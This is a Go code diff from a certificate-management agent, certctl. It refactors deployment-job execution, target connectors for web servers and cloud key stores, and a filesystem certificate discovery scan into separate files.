func (a *Agent) executeDeploymentJob(ctx context.Context, job JobItem) {
|
|
||||||
a.logger.Info("executing deployment job",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"certificate_id", job.CertificateID,
|
|
||||||
"target_type", job.TargetType)
|
|
||||||
|
|
||||||
// Report job as running
|
|
||||||
if err := a.reportJobStatus(ctx, job.ID, "Running", ""); err != nil {
|
|
||||||
a.logger.Error("failed to report job running", "error", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Fetch the certificate from the control plane
|
|
||||||
certPEM, err := a.fetchCertificate(ctx, job.CertificateID)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("failed to fetch certificate",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("cert fetch failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("certificate fetched for deployment",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"cert_length", len(certPEM))
|
|
||||||
|
|
||||||
// Split PEM into cert and chain (separated by double newline between PEM blocks)
|
|
||||||
certOnly, chainPEM := splitPEMChain(certPEM)
|
|
||||||
|
|
||||||
// Check for locally-stored private key (agent keygen mode)
|
|
||||||
keyPath := filepath.Join(a.config.KeyDir, job.CertificateID+".key")
|
|
||||||
var keyPEM string
|
|
||||||
keyData, err := os.ReadFile(keyPath)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("failed to read local private key for deployment",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"key_path", keyPath,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key read failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
keyPEM = string(keyData)
|
|
||||||
a.logger.Info("loaded local private key for deployment",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"key_path", keyPath)
|
|
||||||
|
|
||||||
// Deploy to the target using the appropriate connector
|
|
||||||
if job.TargetType != "" {
|
|
||||||
connector, err := a.createTargetConnector(ctx, job.TargetType, job.TargetConfig)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("failed to create target connector",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"target_type", job.TargetType,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("connector init failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
// Bundle 1 / RT-C1 closure (2026-05-12): defense in depth. The server
|
|
||||||
// runs internal/connector/target/configcheck.Validate on the way IN
|
|
||||||
// (Create/Update), and rejects shell metacharacters in command-bearing
|
|
||||||
// fields. Re-run the connector's full ValidateConfig here on the way
|
|
||||||
// OUT, before any DeployCertificate call. This catches (a) configs
|
|
||||||
// that pre-date the server-side guard, (b) corruption/tampering of
|
|
||||||
// the encrypted config blob, and (c) per-connector filesystem
|
|
||||||
// invariants (cert dir exists, paths writable) that the server can't
|
|
||||||
// check because the filesystem is on the agent host.
|
|
||||||
if err := connector.ValidateConfig(ctx, job.TargetConfig); err != nil {
|
|
||||||
a.logger.Error("connector config validation failed",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"target_type", job.TargetType,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("%s config validation failed: %v", job.TargetType, err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
deployReq := target.DeploymentRequest{
|
|
||||||
CertPEM: certOnly,
|
|
||||||
KeyPEM: keyPEM,
|
|
||||||
ChainPEM: chainPEM,
|
|
||||||
TargetConfig: job.TargetConfig,
|
|
||||||
Metadata: map[string]string{
|
|
||||||
"certificate_id": job.CertificateID,
|
|
||||||
"job_id": job.ID,
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
// Phase 2 of the deploy-hardening I master bundle:
|
|
||||||
// per-target deploy mutex. Acquire BEFORE
|
|
||||||
// DeployCertificate so two concurrent renewals against
|
|
||||||
// the same target ID serialize. The lock is held for the
|
|
||||||
// full Deploy duration including PreCommit (validate),
|
|
||||||
// PostCommit (reload), and post-deploy verify (Phases
|
|
||||||
// 4-9). Released on every return path via defer.
|
|
||||||
var targetID string
|
|
||||||
if job.TargetID != nil {
|
|
||||||
targetID = *job.TargetID
|
|
||||||
}
|
|
||||||
if mu := a.targetDeployMutex(targetID); mu != nil {
|
|
||||||
mu.Lock()
|
|
||||||
defer mu.Unlock()
|
|
||||||
}
|
|
||||||
|
|
||||||
result, err := connector.DeployCertificate(ctx, deployReq)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("deployment failed",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"target_type", job.TargetType,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("deployment failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("target connector deployment completed",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"target_type", job.TargetType,
|
|
||||||
"success", result.Success,
|
|
||||||
"message", result.Message)
|
|
||||||
|
|
||||||
// If verification is enabled, verify the deployment by probing the live TLS endpoint
|
|
||||||
targetHost, targetPort, err := extractTargetHostAndPort(job.TargetConfig)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Warn("could not extract target host/port for verification",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"error", err)
|
|
||||||
} else {
|
|
||||||
a.verifyAndReportDeployment(ctx, job, targetHost, targetPort, certOnly)
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
a.logger.Info("no target type specified, skipping connector invocation",
|
|
||||||
"job_id", job.ID)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Report job as completed
|
|
||||||
if err := a.reportJobStatus(ctx, job.ID, "Completed", ""); err != nil {
|
|
||||||
a.logger.Error("failed to report job completed", "error", err)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("deployment job completed", "job_id", job.ID)
|
|
||||||
}
|
|
||||||
|
|
||||||
// createTargetConnector instantiates the appropriate target connector based on type.
|
|
||||||
// ctx is threaded into SDK-driven connectors (AWSACM, AzureKeyVault) so credential
|
|
||||||
// resolution honors caller cancellation / deadlines instead of using a fresh
|
|
||||||
// context.Background() (the contextcheck linter enforces this — the original Rank 5
|
|
||||||
// implementation used Background() and tripped CI on commit 502823d).
|
|
||||||
func (a *Agent) createTargetConnector(ctx context.Context, targetType string, configJSON json.RawMessage) (target.Connector, error) {
|
|
||||||
switch targetType {
|
|
||||||
case "NGINX":
|
|
||||||
var cfg nginx.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid NGINX config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return nginx.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "Apache":
|
|
||||||
var cfg apache.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Apache config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return apache.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "HAProxy":
|
|
||||||
var cfg haproxy.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid HAProxy config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return haproxy.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "F5":
|
|
||||||
var cfg f5.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid F5 config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
conn, err := f5.New(&cfg, a.logger)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("failed to create F5 connector: %w", err)
|
|
||||||
}
|
|
||||||
return conn, nil
|
|
||||||
|
|
||||||
case "IIS":
|
|
||||||
var cfg iis.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid IIS config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return iis.New(&cfg, a.logger)
|
|
||||||
|
|
||||||
case "Traefik":
|
|
||||||
var cfg traefik.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Traefik config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return traefik.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "Caddy":
|
|
||||||
var cfg caddy.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Caddy config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return caddy.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "Envoy":
|
|
||||||
var cfg envoy.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Envoy config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return envoy.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "Postfix":
|
|
||||||
var cfg pf.Config
|
|
||||||
cfg.Mode = "postfix"
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Postfix config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return pf.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "Dovecot":
|
|
||||||
var cfg pf.Config
|
|
||||||
cfg.Mode = "dovecot"
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid Dovecot config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return pf.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "SSH":
|
|
||||||
var cfg sshconn.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid SSH config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return sshconn.New(&cfg, a.logger)
|
|
||||||
|
|
||||||
case "WinCertStore":
|
|
||||||
var cfg wcs.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid WinCertStore config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return wcs.New(&cfg, a.logger)
|
|
||||||
|
|
||||||
case "JavaKeystore":
|
|
||||||
var cfg jks.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid JavaKeystore config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return jks.New(&cfg, a.logger), nil
|
|
||||||
|
|
||||||
case "KubernetesSecrets":
|
|
||||||
var cfg k8s.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid KubernetesSecrets config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return k8s.New(&cfg, a.logger)
|
|
||||||
|
|
||||||
case "AWSACM":
|
|
||||||
// Rank 5 of the 2026-05-03 Infisical deep-research deliverable.
|
|
||||||
// AWS Certificate Manager target — SDK-driven (no file I/O).
|
|
||||||
// LoadDefaultConfig handles the standard AWS credential chain
|
|
||||||
// (IRSA / EC2 instance profile / SSO / env vars) without any
|
|
||||||
// long-lived creds in connector Config.
|
|
||||||
var cfg awsacm.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid AWSACM config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return awsacm.New(ctx, &cfg, a.logger)
|
|
||||||
|
|
||||||
case "AzureKeyVault":
|
|
||||||
// Rank 5 of the 2026-05-03 Infisical deep-research deliverable.
|
|
||||||
// Azure Key Vault target — SDK-driven (no file I/O).
|
|
||||||
// DefaultAzureCredential handles the standard Azure credential
|
|
||||||
// chain (managed identity / workload identity / env vars / az
|
|
||||||
// CLI fallback). Long-lived service-principal secrets are
|
|
||||||
// supported but discouraged via the credential_mode config.
|
|
||||||
var cfg azurekv.Config
|
|
||||||
if len(configJSON) > 0 {
|
|
||||||
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
|
||||||
return nil, fmt.Errorf("invalid AzureKeyVault config: %w", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return azurekv.New(ctx, &cfg, a.logger)
|
|
||||||
|
|
||||||
default:
|
|
||||||
return nil, fmt.Errorf("unsupported target type: %s", targetType)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// splitPEMChain splits a PEM chain into the first certificate (cert) and the rest (chain).
|
|
||||||
// The control plane returns the full chain as a single string with PEM blocks concatenated.
|
|
||||||
func splitPEMChain(pemChain string) (string, string) {
|
|
||||||
data := []byte(pemChain)
|
|
||||||
block, rest := pem.Decode(data)
|
|
||||||
if block == nil {
|
|
||||||
return pemChain, ""
|
|
||||||
}
|
|
||||||
cert := string(pem.EncodeToMemory(block))
|
|
||||||
|
|
||||||
// Skip whitespace between cert and chain
|
|
||||||
chain := strings.TrimSpace(string(rest))
|
|
||||||
if chain == "" {
|
|
||||||
return cert, ""
|
|
||||||
}
|
|
||||||
return cert, chain
|
|
||||||
}
|
|
||||||
|
|
||||||
// fetchCertificate retrieves the certificate PEM chain from the control plane.
|
|
||||||
// GET /api/v1/agents/{agentID}/certificates/{certID}
|
|
||||||
func (a *Agent) fetchCertificate(ctx context.Context, certID string) (string, error) {
|
|
||||||
path := fmt.Sprintf("/api/v1/agents/%s/certificates/%s", a.config.AgentID, certID)
|
|
||||||
resp, err := a.makeRequest(ctx, http.MethodGet, path, nil)
|
|
||||||
if err != nil {
|
|
||||||
return "", fmt.Errorf("request failed: %w", err)
|
|
||||||
}
|
|
||||||
defer resp.Body.Close()
|
|
||||||
|
|
||||||
if resp.StatusCode != http.StatusOK {
|
|
||||||
body, _ := io.ReadAll(resp.Body)
|
|
||||||
return "", fmt.Errorf("server returned %d: %s", resp.StatusCode, string(body))
|
|
||||||
}
|
|
||||||
|
|
||||||
var certResp struct {
|
|
||||||
CertificatePEM string `json:"certificate_pem"`
|
|
||||||
}
|
|
||||||
if err := json.NewDecoder(resp.Body).Decode(&certResp); err != nil {
|
|
||||||
return "", fmt.Errorf("failed to decode response: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
return certResp.CertificatePEM, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// reportJobStatus reports the result of a job back to the control plane.
|
// reportJobStatus reports the result of a job back to the control plane.
|
||||||
// POST /api/v1/agents/{agentID}/jobs/{jobID}/status
|
// POST /api/v1/agents/{agentID}/jobs/{jobID}/status
|
||||||
func (a *Agent) reportJobStatus(ctx context.Context, jobID string, status string, errorMsg string) error {
|
func (a *Agent) reportJobStatus(ctx context.Context, jobID string, status string, errorMsg string) error {
|
||||||
@@ -1067,239 +430,6 @@ func (a *Agent) makeRequest(ctx context.Context, method, path string, body inter
|
|||||||
return resp, nil
|
return resp, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// runDiscoveryScan walks configured directories, parses certificate files, and reports
|
|
||||||
// discovered certificates to the control plane.
|
|
||||||
// Supports PEM and DER encoded X.509 certificates.
|
|
||||||
func (a *Agent) runDiscoveryScan(ctx context.Context) {
|
|
||||||
a.logger.Info("starting filesystem certificate discovery scan",
|
|
||||||
"directories", a.config.DiscoveryDirs)
|
|
||||||
|
|
||||||
startTime := time.Now()
|
|
||||||
var certs []discoveredCertEntry
|
|
||||||
var scanErrors []string
|
|
||||||
|
|
||||||
for _, dir := range a.config.DiscoveryDirs {
|
|
||||||
a.logger.Debug("scanning directory", "path", dir)
|
|
||||||
|
|
||||||
err := filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {
|
|
||||||
if err != nil {
|
|
||||||
scanErrors = append(scanErrors, fmt.Sprintf("walk error at %s: %v", path, err))
|
|
||||||
return nil // continue walking
|
|
||||||
}
|
|
||||||
if info.IsDir() {
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// Skip files larger than 1MB (unlikely to be a certificate)
|
|
||||||
if info.Size() > 1*1024*1024 {
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// Check file extension
|
|
||||||
ext := strings.ToLower(filepath.Ext(path))
|
|
||||||
switch ext {
|
|
||||||
case ".pem", ".crt", ".cer", ".cert":
|
|
||||||
found := a.parsePEMFile(path)
|
|
||||||
certs = append(certs, found...)
|
|
||||||
case ".der":
|
|
||||||
if entry, err := a.parseDERFile(path); err == nil {
|
|
||||||
certs = append(certs, entry)
|
|
||||||
} else {
|
|
||||||
a.logger.Debug("skipping non-cert DER file", "path", path, "error", err)
|
|
||||||
}
|
|
||||||
default:
|
|
||||||
// Try PEM parsing for extensionless files or unknown extensions
|
|
||||||
if ext == "" || ext == ".key" {
|
|
||||||
return nil // skip key files and extensionless
|
|
||||||
}
|
|
||||||
found := a.parsePEMFile(path)
|
|
||||||
if len(found) > 0 {
|
|
||||||
certs = append(certs, found...)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return nil
|
|
||||||
})
|
|
||||||
if err != nil {
|
|
||||||
scanErrors = append(scanErrors, fmt.Sprintf("failed to walk %s: %v", dir, err))
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
scanDuration := time.Since(startTime)
|
|
||||||
a.logger.Info("discovery scan completed",
|
|
||||||
"certificates_found", len(certs),
|
|
||||||
"errors", len(scanErrors),
|
|
||||||
"duration_ms", scanDuration.Milliseconds())
|
|
||||||
|
|
||||||
if len(certs) == 0 && len(scanErrors) == 0 {
|
|
||||||
a.logger.Debug("no certificates found and no errors, skipping report")
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
// Build report payload
|
|
||||||
entries := make([]map[string]interface{}, len(certs))
|
|
||||||
for i, c := range certs {
|
|
||||||
entries[i] = map[string]interface{}{
|
|
||||||
"fingerprint_sha256": c.FingerprintSHA256,
|
|
||||||
"common_name": c.CommonName,
|
|
||||||
"sans": c.SANs,
|
|
||||||
"serial_number": c.SerialNumber,
|
|
||||||
"issuer_dn": c.IssuerDN,
|
|
||||||
"subject_dn": c.SubjectDN,
|
|
||||||
"not_before": c.NotBefore,
|
|
||||||
"not_after": c.NotAfter,
|
|
||||||
"key_algorithm": c.KeyAlgorithm,
|
|
||||||
"key_size": c.KeySize,
|
|
||||||
"is_ca": c.IsCA,
|
|
||||||
"pem_data": c.PEMData,
|
|
||||||
"source_path": c.SourcePath,
|
|
||||||
"source_format": c.SourceFormat,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
report := map[string]interface{}{
|
|
||||||
"agent_id": a.config.AgentID,
|
|
||||||
"directories": a.config.DiscoveryDirs,
|
|
||||||
"certificates": entries,
|
|
||||||
"errors": scanErrors,
|
|
||||||
"scan_duration_ms": int(scanDuration.Milliseconds()),
|
|
||||||
}
|
|
||||||
|
|
||||||
// Submit to control plane
|
|
||||||
path := fmt.Sprintf("/api/v1/agents/%s/discoveries", a.config.AgentID)
|
|
||||||
resp, err := a.makeRequest(ctx, http.MethodPost, path, report)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("failed to submit discovery report", "error", err)
|
|
||||||
return
|
|
||||||
}
|
|
||||||
defer resp.Body.Close()
|
|
||||||
|
|
||||||
if resp.StatusCode != http.StatusAccepted {
|
|
||||||
body, _ := io.ReadAll(resp.Body)
|
|
||||||
a.logger.Error("discovery report rejected",
|
|
||||||
"status", resp.StatusCode,
|
|
||||||
"body", string(body))
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("discovery report submitted successfully",
|
|
||||||
"certificates", len(certs),
|
|
||||||
"errors", len(scanErrors))
|
|
||||||
}
|
|
||||||
|
|
||||||
// discoveredCertEntry holds parsed certificate metadata for reporting.
|
|
||||||
type discoveredCertEntry struct {
|
|
||||||
FingerprintSHA256 string `json:"fingerprint_sha256"`
|
|
||||||
CommonName string `json:"common_name"`
|
|
||||||
SANs []string `json:"sans"`
|
|
||||||
SerialNumber string `json:"serial_number"`
|
|
||||||
IssuerDN string `json:"issuer_dn"`
|
|
||||||
SubjectDN string `json:"subject_dn"`
|
|
||||||
NotBefore string `json:"not_before"`
|
|
||||||
NotAfter string `json:"not_after"`
|
|
||||||
KeyAlgorithm string `json:"key_algorithm"`
|
|
||||||
KeySize int `json:"key_size"`
|
|
||||||
IsCA bool `json:"is_ca"`
|
|
||||||
PEMData string `json:"pem_data"`
|
|
||||||
SourcePath string `json:"source_path"`
|
|
||||||
SourceFormat string `json:"source_format"`
|
|
||||||
}
|
|
||||||
|
|
||||||
// parsePEMFile reads a file and extracts all X.509 certificates from PEM blocks.
|
|
||||||
func (a *Agent) parsePEMFile(path string) []discoveredCertEntry {
|
|
||||||
data, err := os.ReadFile(path)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Debug("failed to read file", "path", path, "error", err)
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
var entries []discoveredCertEntry
|
|
||||||
rest := data
|
|
||||||
for {
|
|
||||||
var block *pem.Block
|
|
||||||
block, rest = pem.Decode(rest)
|
|
||||||
if block == nil {
|
|
||||||
break
|
|
||||||
}
|
|
||||||
if block.Type != "CERTIFICATE" {
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
cert, err := x509.ParseCertificate(block.Bytes)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Debug("failed to parse certificate in PEM", "path", path, "error", err)
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
|
|
||||||
pemStr := string(pem.EncodeToMemory(block))
|
|
||||||
entries = append(entries, certToEntry(cert, path, "PEM", pemStr))
|
|
||||||
}
|
|
||||||
return entries
|
|
||||||
}
|
|
||||||
|
|
||||||
// parseDERFile reads a DER-encoded certificate file.
|
|
||||||
func (a *Agent) parseDERFile(path string) (discoveredCertEntry, error) {
|
|
||||||
data, err := os.ReadFile(path)
|
|
||||||
if err != nil {
|
|
||||||
return discoveredCertEntry{}, fmt.Errorf("read failed: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
cert, err := x509.ParseCertificate(data)
|
|
||||||
if err != nil {
|
|
||||||
return discoveredCertEntry{}, fmt.Errorf("parse failed: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Convert to PEM for storage
|
|
||||||
pemStr := string(pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: data}))
|
|
||||||
return certToEntry(cert, path, "DER", pemStr), nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// certToEntry converts a parsed x509.Certificate into a discoveredCertEntry.
|
|
||||||
func certToEntry(cert *x509.Certificate, path, format, pemData string) discoveredCertEntry {
|
|
||||||
// Compute SHA-256 fingerprint
|
|
||||||
fingerprint := fmt.Sprintf("%x", sha256Sum(cert.Raw))
|
|
||||||
|
|
||||||
// Determine key algorithm and size
|
|
||||||
keyAlg, keySize := certKeyInfo(cert)
|
|
||||||
|
|
||||||
return discoveredCertEntry{
|
|
||||||
FingerprintSHA256: fingerprint,
|
|
||||||
CommonName: cert.Subject.CommonName,
|
|
||||||
SANs: cert.DNSNames,
|
|
||||||
SerialNumber: cert.SerialNumber.Text(16),
|
|
||||||
IssuerDN: cert.Issuer.String(),
|
|
||||||
SubjectDN: cert.Subject.String(),
|
|
||||||
NotBefore: cert.NotBefore.UTC().Format(time.RFC3339),
|
|
||||||
NotAfter: cert.NotAfter.UTC().Format(time.RFC3339),
|
|
||||||
KeyAlgorithm: keyAlg,
|
|
||||||
KeySize: keySize,
|
|
||||||
IsCA: cert.IsCA,
|
|
||||||
PEMData: pemData,
|
|
||||||
SourcePath: path,
|
|
||||||
SourceFormat: format,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// sha256Sum returns the SHA-256 hash of data.
|
|
||||||
func sha256Sum(data []byte) [32]byte {
|
|
||||||
return sha256.Sum256(data)
|
|
||||||
}
|
|
||||||
|
|
||||||
// certKeyInfo extracts key algorithm name and size from a certificate.
|
|
||||||
func certKeyInfo(cert *x509.Certificate) (string, int) {
|
|
||||||
switch pub := cert.PublicKey.(type) {
|
|
||||||
case *ecdsa.PublicKey:
|
|
||||||
return "ECDSA", pub.Curve.Params().BitSize
|
|
||||||
case *rsa.PublicKey:
|
|
||||||
return "RSA", pub.N.BitLen()
|
|
||||||
default:
|
|
||||||
switch cert.PublicKeyAlgorithm {
|
|
||||||
case x509.Ed25519:
|
|
||||||
return "Ed25519", 256
|
|
||||||
default:
|
|
||||||
return cert.PublicKeyAlgorithm.String(), 0
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func main() {
|
func main() {
|
||||||
// Parse command-line flags (with env var fallbacks for Docker deployment)
|
// Parse command-line flags (with env var fallbacks for Docker deployment)
|
||||||
serverURL := flag.String("server", getEnvDefault("CERTCTL_SERVER_URL", "https://localhost:8443"), "Control plane server URL (must be https://)")
|
serverURL := flag.String("server", getEnvDefault("CERTCTL_SERVER_URL", "https://localhost:8443"), "Control plane server URL (must be https://)")
|
||||||
|
|||||||
@@ -0,0 +1,278 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"crypto/ecdsa"
|
||||||
|
"crypto/elliptic"
|
||||||
|
"crypto/rand"
|
||||||
|
"crypto/x509"
|
||||||
|
"crypto/x509/pkix"
|
||||||
|
"encoding/json"
|
||||||
|
"encoding/pem"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"net/http"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 12 (2026-05-14): extracted from
|
||||||
|
// cmd/agent/main.go via the Option B sibling-file pattern (mirrors
|
||||||
|
// the Sprint 8 cmd/server cut). Package stays `main`; all methods
|
||||||
|
// are still defined on *Agent so every call site continues to
|
||||||
|
// resolve through Go's same-package method-set without any
|
||||||
|
// import-path change.
|
||||||
|
//
|
||||||
|
// This file holds the WORK-POLLING entry point + CSR-job execution
|
||||||
|
// — the inbound side of the agent's pull-only deployment model
|
||||||
|
// (per CLAUDE.md "Pull-only deployment model" architecture
|
||||||
|
// decision):
|
||||||
|
//
|
||||||
|
// - pollForWork: queries GET /api/v1/agents/{id}/work each tick;
|
||||||
|
// dispatches each returned JobItem to the appropriate
|
||||||
|
// executor (CSR vs deployment).
|
||||||
|
// - executeCSRJob: handles AwaitingCSR jobs by generating an
|
||||||
|
// ECDSA P-256 key locally, persisting it to keyDir/<certID>.key
|
||||||
|
// with 0600 permissions (key NEVER leaves the agent — see
|
||||||
|
// CLAUDE.md "Agent-based key management"), creating the CSR,
|
||||||
|
// and POSTing it to the control plane for signing.
|
||||||
|
//
|
||||||
|
// The deployment-job executor lives in deploy.go alongside the
|
||||||
|
// target connector factory + deploy-only helpers (splitPEMChain,
|
||||||
|
// fetchCertificate). The discovery scan lives in discovery.go.
|
||||||
|
|
||||||
|
// pollForWork queries the control plane for actionable jobs and processes them.
|
||||||
|
// Jobs may be deployment jobs (Pending) or CSR jobs (AwaitingCSR).
|
||||||
|
// GET /api/v1/agents/{agentID}/work
|
||||||
|
func (a *Agent) pollForWork(ctx context.Context) {
|
||||||
|
a.logger.Debug("polling for work", "agent_id", a.config.AgentID)
|
||||||
|
|
||||||
|
path := fmt.Sprintf("/api/v1/agents/%s/work", a.config.AgentID)
|
||||||
|
resp, err := a.makeRequest(ctx, http.MethodGet, path, nil)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("work poll failed", "error", err)
|
||||||
|
a.consecutiveFailures++
|
||||||
|
return
|
||||||
|
